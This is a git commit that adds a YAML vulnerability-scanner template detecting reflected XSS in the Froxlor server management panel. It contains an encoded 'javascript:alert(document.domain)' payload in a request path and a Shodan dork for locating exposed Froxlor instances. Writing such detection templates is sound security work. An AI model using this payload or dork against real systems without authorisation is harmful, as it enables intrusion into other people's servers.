Create froxlor-reflected-xss.yaml

patch-1
Arman 2023-01-17 12:16:26 -05:00 committed by GitHub
parent cb17c8285b
commit 7ccc6a7171
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 34 additions and 0 deletions

View File

@ -0,0 +1,34 @@
id: froxlor-reflected-xss
info:
name: Froxlor Reflected XSS
author: tess
severity: medium
metadata:
verified: true
shodan-dork: title:"Froxlor Server Management Panel"
tags: froxlor,xss
requests:
- method: GET
path:
- '{{BaseURL}}//index.php/javascript%26colon%3Balert(document.domain);dd%26sol%3b%26sol%3b'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "javascript:alert(document.domain);dd//"
- "Froxlor"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200